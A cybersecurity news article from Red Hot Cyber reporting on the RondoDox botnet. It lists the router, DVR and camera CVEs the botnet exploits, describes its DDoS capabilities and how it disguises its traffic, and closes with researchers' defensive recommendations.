RondoDox Botnet Discovered: Thousands of Devices at Risk

Redazione RHC : 11 October 2025 08:15

A large botnet called RondoDox has been discovered exploiting 56 vulnerabilities in more than 30 different devices, including bugs first demonstrated during the Pwn2Own hacking competition.

Attackers target a wide range of Internet-accessible devices, including digital video recorders (DVRs), network video recorders (NVRs), video surveillance systems, and web servers.

RondoDox uses a strategy that Trend Micro researchers call a “shotgun exploit”: the malware uses multiple exploits simultaneously to maximize the number of infections, despite the high-profile nature of this activity.

Researchers report that, among other vulnerabilities, RondoDox attacks CVE-2023-1389, a bug in the TP-Link Archer AX21 Wi-Fi router, initially demonstrated at Pwn2Own Toronto 2022. They note that the botnet’s developers closely monitor the exploits demonstrated at Pwn2Own and then begin using them in practice.

Among the n-day vulnerabilities that RondoDox has already added to its arsenal are:

• Digiever – CVE-2023-52163;
• Qnap – CVE-2023-47565;
• LB-LINK – CVE-2023-26801;
• TRENDnet – CVE-2023-51833;
• D-Link – CVE-2024-10914;
• TBK – CVE-2024-3721;
• Netgear – CVE-2024-12847;
• AVTECH – CVE-2024-7029;
• TOTOLINK – CVE-2024-1781;
• Tenda – CVE-2025-7414;
• TOTOLINK – CVE-2025-1829;
• Meteobridge – CVE-2025-4008;
• Edimax – CVE-2025-22905;
• Linksys – CVE-2025-34037;
• TOTOLINK – CVE-2025-5504;
• TP-Link – CVE-2023-1389.

Experts write that older vulnerabilities, especially in devices that are past their support period, pose a serious problem, as they are less likely to receive patches. Newer issues with supported hardware are no less dangerous, as many users simply ignore firmware updates after the initial device setup.

Trend Micro analysts report that RondoDox uses exploits for 18 command injection vulnerabilities that have not yet been assigned a CVE identifier. These vulnerabilities affect D-Link NAS devices, TVT and LILIN DVRs, Fiberhome, ASMAX, and Linksys routers, Brickcom cameras, and other unspecified devices.

As previously reported by FortiGuard Labs , RondoDox is capable of launching DDoS attacks using HTTP, UDP, and TCP. To avoid detection, the botnet disguises its malicious traffic as popular games and platforms, including Minecraft, Dark and Darker, Roblox, DayZ, Fortnite, and Valve’s GTA, as well as tools like Discord, OpenVPN, WireGuard, and RakNet.

To protect against RondoDox attacks, researchers recommend installing the latest available firmware updates and promptly replacing out-of-date hardware. They also recommend segmenting the network, isolating critical data from internet-accessible IoT devices and guest connections, as well as changing default credentials and using strong passwords.

Redazione
The editorial team of Red Hot Cyber consists of a group of individuals and anonymous sources who actively collaborate to provide early information and news on cybersecurity and computing in general.

Lista degli articoli